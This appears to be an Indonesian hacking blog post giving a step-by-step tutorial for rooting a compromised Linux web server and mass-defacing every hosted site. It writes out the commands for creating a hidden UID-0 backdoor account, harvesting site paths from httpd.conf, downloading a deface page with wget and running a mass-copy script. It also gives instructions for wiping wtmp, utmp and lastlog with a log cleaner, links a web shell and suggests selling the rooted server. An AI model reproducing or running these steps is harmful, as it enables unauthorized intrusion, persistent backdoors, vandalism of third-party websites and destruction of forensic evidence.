- Home>
- DOWNLOAD , Underground >
- rooting - manual mass defacing (black Buntu)
Anak baru numpang posting yah,. ok langsung aja yah ga usah pake basa basi,.
pertama kmu backconect dlu ke shell mu,. terserah mau pke apa keq,. nc atau bind shell,. disni aku make bind shell,.
comand2'a, lihat aja di gambar,..
setelah check kernel n segala macem'a,.. kmu upload localroot yg pas sama kernel di shell mu,. trus kasih chmod 777 di tuh local,
tggal jalanin deh local yg sdah kmu upload tadi,.
klo berhasil ke root, mka id'a berubah, sperti gambar yg di atas,.
tahap akhir'a,. tggal add usermu aja distu,.
klo udah berhasil,. jadi'a kek gini
penjelasan'a,..
sekrang apa lagi,.??
ya terserah mau kalian apakan,. ntah itu mau di jual, mau di pke sndri, atau mau di deface,.
klo mau di deface, kita lanjut lagi,. :D
login di putty dan masukan ip server dan port yang mau kita mass deface,..
sekarang kita masuk ke "etc/httpd/conf" untuk mengambil semua nama website n user yang ada di sever.. kita masukan comand berikut :
setelah itu kita ambil semua nama web yg ada di server dan mengcopy'a di shell kita dengan nama "web.txt" (terserah sih mau pke nama apa)
comand'a :
untuk NamaUser, klian bisa lihat di shell kalian masing2...
sekarang kita ambil lagi nama2 user'a, kemudian copy semua user yg ada di dalam user.txt ke notepad..
comand'a :
setelah itu kita kembali ke dir root, dan buat dir baru (terserah mau pke nama dir apa, disini saya pke nama dir bie) dan kita masuk ke dir baru yg kita buat itu, dan kita download deface page kita ke dalam dir yg baru kita buat itu,..
comand'a :
ok,. kita sudah pnya deface page, sekarang kita buat file mass.sh kita dulu,..
ganti semua tulisan "DocumentRoot" dengan "cp defacepage.html" disni yg perlu kita perhatikan, bila kita mau taruh file deface kita di index, mka kita menggunakan "cp index.html" bila gak, klian bisa mengganti'a dengan nama file yg lain,.. disini aku pke "bie.htm"
kemudian kembali ke putty kita, ketik comand "nano mass.sh" lalu copas semua nama users yg sudah kita ganti tadi, setelah itu ketik control "o", enter, trus control "x" untuk kmbali,..
setelah itu kita berikan perm 777 pada mass.sh kita, lalu jalankan mass.sh kita
yep,.. selese mass deface'a,..
sekarang kembali ke dir root, lalu hapus dir baru yang kalian bikin tadi
lalu jalankan log cleaner kalian, trus exit.. :)
log cleaner bisa klian dapet dsini : http://pastebin.com/Csfw9BrY
cara pke'a :
1. Copy source log cleaner'a di notepad lalu save dengan nama remove.c trus perhatikan
Harap diingat bahwa tidak selalu file2 wtmp utmp dan lastlog berada pada posisi yang sama jadi jangan lupa cek apakah posisi file2 wtmp utmp dan lastlog sudah sesuai dengan source remove.c log'a atau belum,..
Kamu bisa gunakan perintah untuk mencari dima posisi2 file wtmp utmp dan lastlog :
Kemudian ganti posisi file2 tersebut di remove.c yg sudah kamu save di notepad tadi sesuai dengan hasil diatas,..
2. Setelah kita rubah, upload ke server / site yg sudah kita root tadi,. saat'a kita compile,. atau bisa jga sekalian compile di desktop (bagi pengguna linux)
dan terakhir kita jalankan remove'a,. :)
trus tggal masukin pilihan'a,.. :)
terkhir, kita ganti semua tulisan "SeverName" dengan "http://"
Tool :
shell yg aku pke diatas : http://pastebin.com/0N805eLE
log cleaner : http://pastebin.com/Csfw9BrY
NC : http://joncraton.org/media/files/nc111nt.zip
puttty : http://portableapps.com/apps/internet/putty_portable
Ps : Tut diatas terdiri dari 2 bagian, tapi saya jadikan satu,. jadi mohon maaf klo kepanjangan,.. :D
untuk weduser (windows user), sama aja koq kyak di atas comand2'a,.. gak jauh beda...
paling beda'a klo di windows pas mau gunain nc'a doank,.
harus masuk di dir nc dlu kan bru bisa gunain bind atau mau back conect...
dah gtu aja,.. moga berguna yah,.. :)
credit : my best teacher Google
pertama kmu backconect dlu ke shell mu,. terserah mau pke apa keq,. nc atau bind shell,. disni aku make bind shell,.
comand2'a, lihat aja di gambar,..
setelah check kernel n segala macem'a,.. kmu upload localroot yg pas sama kernel di shell mu,. trus kasih chmod 777 di tuh local,
tggal jalanin deh local yg sdah kmu upload tadi,.
klo berhasil ke root, mka id'a berubah, sperti gambar yg di atas,.
tahap akhir'a,. tggal add usermu aja distu,.
klo udah berhasil,. jadi'a kek gini
penjelasan'a,..
PHP Code:
adduser -u 0 -o -g 0 -G 0,1,2,3,4,6,10 -M ftp-user
adduser = comand untuk nambahin user-u 0 -o = set user jadi dngn ID nol (0) root.
-g 0 = set initial group dengan ID nol (0) root.
-G 0,1,2,3,4,6,10 = set additional group ke:0 = root
1 = bin
2 = daemon
3 = sys
4 = adm
6 = disk
10 = wheel-M – ‘home directory’ tidak di create ke user.ftp-user = username dri user yg mau dipke
sekrang apa lagi,.??
ya terserah mau kalian apakan,. ntah itu mau di jual, mau di pke sndri, atau mau di deface,.
klo mau di deface, kita lanjut lagi,. :D
login di putty dan masukan ip server dan port yang mau kita mass deface,..
sekarang kita masuk ke "etc/httpd/conf" untuk mengambil semua nama website n user yang ada di sever.. kita masukan comand berikut :
PHP Code:
cd /etc/httpd/conf
setelah itu kita ambil semua nama web yg ada di server dan mengcopy'a di shell kita dengan nama "web.txt" (terserah sih mau pke nama apa)
comand'a :
PHP Code:
cat httpd.conf | grep -i ServerName > /home/NamaUser/public_html/web.txt
sekarang kita ambil lagi nama2 user'a, kemudian copy semua user yg ada di dalam user.txt ke notepad..
comand'a :
PHP Code:
cat httpd.conf | grep -i DocumentRoot > /home/NamaUser/public_html/user.txt
setelah itu kita kembali ke dir root, dan buat dir baru (terserah mau pke nama dir apa, disini saya pke nama dir bie) dan kita masuk ke dir baru yg kita buat itu, dan kita download deface page kita ke dalam dir yg baru kita buat itu,..
comand'a :
PHP Code:
cd /root; mkdir bie; cd bie
wget http://blablabla.com/deface.html
ok,. kita sudah pnya deface page, sekarang kita buat file mass.sh kita dulu,..
ganti semua tulisan "DocumentRoot" dengan "cp defacepage.html" disni yg perlu kita perhatikan, bila kita mau taruh file deface kita di index, mka kita menggunakan "cp index.html" bila gak, klian bisa mengganti'a dengan nama file yg lain,.. disini aku pke "bie.htm"
kemudian kembali ke putty kita, ketik comand "nano mass.sh" lalu copas semua nama users yg sudah kita ganti tadi, setelah itu ketik control "o", enter, trus control "x" untuk kmbali,..
setelah itu kita berikan perm 777 pada mass.sh kita, lalu jalankan mass.sh kita
PHP Code:
chmod 777 mass.sh; ./mass.sh
yep,.. selese mass deface'a,..
sekarang kembali ke dir root, lalu hapus dir baru yang kalian bikin tadi
lalu jalankan log cleaner kalian, trus exit.. :)
log cleaner bisa klian dapet dsini : http://pastebin.com/Csfw9BrY
cara pke'a :
1. Copy source log cleaner'a di notepad lalu save dengan nama remove.c trus perhatikan
Harap diingat bahwa tidak selalu file2 wtmp utmp dan lastlog berada pada posisi yang sama jadi jangan lupa cek apakah posisi file2 wtmp utmp dan lastlog sudah sesuai dengan source remove.c log'a atau belum,..
Kamu bisa gunakan perintah untuk mencari dima posisi2 file wtmp utmp dan lastlog :
PHP Code:
find / -name wtmp -printfind / -name utmp -printfind / -name lastlog -printatau
whereis wtmp
whereis utmp
whereis lastlog
Kemudian ganti posisi file2 tersebut di remove.c yg sudah kamu save di notepad tadi sesuai dengan hasil diatas,..
2. Setelah kita rubah, upload ke server / site yg sudah kita root tadi,. saat'a kita compile,. atau bisa jga sekalian compile di desktop (bagi pengguna linux)
PHP Code:
gcc remove.c -o remove -DGENERIC
remove.c: In function `main':
remove.c:50: warning: return type of `main' is not `int'/tmp/ccZVzySI.o: In function `main':
/tmp/ccZVzySI.o(.text+0xb4): the `gets' function is dangerous and should
not be used.
PHP Code:
./remove namarootuser
trus tggal masukin pilihan'a,.. :)
terkhir, kita ganti semua tulisan "SeverName" dengan "http://"
Tool :
shell yg aku pke diatas : http://pastebin.com/0N805eLE
log cleaner : http://pastebin.com/Csfw9BrY
NC : http://joncraton.org/media/files/nc111nt.zip
puttty : http://portableapps.com/apps/internet/putty_portable
Ps : Tut diatas terdiri dari 2 bagian, tapi saya jadikan satu,. jadi mohon maaf klo kepanjangan,.. :D
untuk weduser (windows user), sama aja koq kyak di atas comand2'a,.. gak jauh beda...
paling beda'a klo di windows pas mau gunain nc'a doank,.
harus masuk di dir nc dlu kan bru bisa gunain bind atau mau back conect...
dah gtu aja,.. moga berguna yah,.. :)
credit : my best teacher Google
Tag :
DOWNLOAD
Underground
Subscribe to:
Post Comments (Atom)
0 comments
Post a Comment